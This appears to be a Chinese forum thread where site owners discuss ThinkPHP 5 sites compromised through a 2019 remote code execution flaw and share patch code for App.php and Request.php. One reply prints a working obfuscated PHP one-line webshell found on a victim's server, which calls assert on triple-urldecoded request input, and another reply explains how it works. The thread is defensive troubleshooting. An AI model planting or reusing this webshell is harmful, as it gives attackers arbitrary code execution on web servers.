level 1
出现这种情况一般是网站有后门,或者已经有病毒文件,在服务器里边找找,或者看看访问日志,能够找到病毒文件的位置,找到删除掉就可以了
2019年02月27日 07点02分
level 13
tp5 哪个版本,前段时间刚爆出来一个漏洞
漏洞影响范围:
Thinkphp 5.1.0 - 5.1.31
Thinkphp 5.0.5 - 5.0.23
2019年02月27日 08点02分
3
漏洞影响范围:
Thinkphp 5.1.0 - 5.1.31
Thinkphp 5.0.5 - 5.0.23
5.0.11,这个漏洞官方有修复的文件么
2019年02月27日 10点02分
2019年02月27日 10点02分
我也找到这一个了 现在是我重新升级了tp版本到最新 然后在控制器验证加了新的正则
2019年02月27日 10点02分
![[泪]](/static/emoticons/u6cea.png)
level 1
楼主,我也是tp5框架帮学校写的一个网站。寒假前同样出现了前段页面错乱的问题,检查项目文件,发现uploads文件夹被传入一些.php文件,删除后网站恢复。(我对web懂得很少所以这些不太了解)现在假后又出现同样情况,感觉和楼主很像。想问一下楼主现在解决了没有,然后具体是怎么解决的?谢谢楼主!
2019年02月27日 12点02分
5
![[吐舌]](/static/emoticons/u5410u820c.png)
我去网上查查有没有修复方法
level 1
<?php $poc ="axsxsxexrxt";$poc_1 = explode("x", $poc); $poc_2 = $poc_1[0] . $poc_1[1] . $poc_1[2] . $poc_1[3]. $poc_1[4]. $poc_1[5];$poc_2(urldecode(urldecode(urldecode($_REQUEST['12345']))));?>
我的也被攻击了是这种代码,你见过吗?
2019年07月08日 09点07分
10
我的也被攻击了是这种代码,你见过吗?
注意最后一行$poc_2(urldecode(urldecode(urldecode($_REQUEST['12345']))));?> 解析最后其实就是assert(urldecode(urldecode(urldecode($_REQUEST['12345'])))); 中间的urldecode只是为了混淆数据层特征,这个是标准的一句话木马
2019年07月19日 01点07分
卧槽,我也用的,里面被注入同样的代码
2019年11月14日 10点11分
![[小乖]](/static/emoticons/u5c0fu4e56.png)
level 1
tp5.0漏洞修复
在thinkphp/library/think/App.php里module方法加上
/防止 网站攻击,修复漏洞
if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {
throw new HttpException(404, 'controller not exists:' . $controller);
}
在thinkphp/library/think/Request.php里方法
//$this->method = strtoupper($_POST[Config::get('var_method')]);
//$this->{$this->method}($_POST);
//防止网站攻击漏洞修复
$method = strtoupper($_POST[Config::get('var_method')]);
if (in_array($method, ['GET', 'POST', 'DELETE', 'PUT', 'PATCH'])) {
$this->method = $method;
$this->{$this->method}($_POST);
} else {
$this->method = 'POST';
}
unset($_POST[Config::get('var_method')]);
2019年07月12日 04点07分
12
在thinkphp/library/think/App.php里module方法加上
/防止 网站攻击,修复漏洞
if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {
throw new HttpException(404, 'controller not exists:' . $controller);
}
在thinkphp/library/think/Request.php里方法
//$this->method = strtoupper($_POST[Config::get('var_method')]);
//$this->{$this->method}($_POST);
//防止网站攻击漏洞修复
$method = strtoupper($_POST[Config::get('var_method')]);
if (in_array($method, ['GET', 'POST', 'DELETE', 'PUT', 'PATCH'])) {
$this->method = $method;
$this->{$this->method}($_POST);
} else {
$this->method = 'POST';
}
unset($_POST[Config::get('var_method')]);
改了还是被改
2019年11月24日 07点11分
level 2
![[滑稽]](/static/emoticons/u6ed1u7a3d.png)
